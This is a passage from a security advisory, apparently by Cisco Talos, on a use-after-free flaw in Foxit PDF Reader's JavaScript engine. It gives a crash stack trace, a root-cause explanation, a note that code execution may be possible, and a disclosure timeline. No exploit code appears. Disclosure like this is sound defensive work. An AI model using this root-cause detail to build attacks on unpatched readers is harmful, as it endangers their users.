17 076fe628 03093c5f 076fe6b0 15b8b60c 175d8a7a FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
18 076fe6a0 03094596 15b8b5e4 0f961790 15b8b5d0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
19 076fe6dc 02c38af7 15f38f70 18bb03bc 0f961790 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1a 076fe794 02c3a129 00000000 076fe824 076fe7cc FoxitPDFReader!safe_vsnprintf+0x10ddcc7
1b 076fe7ac 00f720df 076fe824 076fe7cc 175d8b06 FoxitPDFReader!safe_vsnprintf+0x10df2f9
1c 076fe7dc 00f70fa4 15f3fb88 00000015 076fe804 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
1d 076fe81c 00f6f9d0 15932710 1035b720 1642d940 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
1e 076fe870 0085d322 076fe8a0 1035b720 1642d940 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1f 076fe8c0 00ad901b 00000000 175d983e 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
20 076ff4e4 04079713 00000000 00000000 175d996e FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
21 076ff5b4 0407a8ec 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
22 076ff5d8 04075292 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
23 076ff64c 04075b05 103652e8 000502f4 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
24 076ff66c 75a412bb 000502f4 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
25 076ff698 75a37a5a 04075ad1 000502f4 00000429 USER32!AddClipboardFormatListener+0x4b
26 076ff780 75a36391 04075ad1 00000000 00000429 USER32!GetClassLongW+0x7aa
27 076ff7fc 75a35eb0 00000329 076ff824 00a5f324 USER32!DispatchMessageW+0x4f1
28 076ff808 00a5f324 0c6a8c60 0c6a8c60 05b998e8 USER32!DispatchMessageW+0x10
29 076ff824 00a5f3e3 05b998e8 00a5f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
2a 076ff844 044a29c2 00000000 05bc550c 075da000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
2b 076ff85c 0425cef1 00610000 00000000 0c6453c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
2c 076ff8a8 76a5fcc9 075da000 76a5fcb0 076ff914 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
2d 076ff8b8 77b87c5e 075da000 336677e2 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 076ff914 77b87c2e ffffffff 77ba8c16 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2f 076ff924 00000000 0425cfc0 075da000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee
At [10] above, we can observe ecx contains the same memory pointer, which belongs to a freed allocation. Note that the vulnerable buffer is reused as a bytestring object. The value at the offset 0xC of the vulnerable buffer is passed as a this pointer to a method at (11). The crash occurs at (12) when this pointer is dereferenced whithout any validation. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
2024-04-11 - Vendor Disclosure
2024-09-26 - Vendor Patch Release
2024-10-02 - Public Release
Discovered by KPC of Cisco Talos.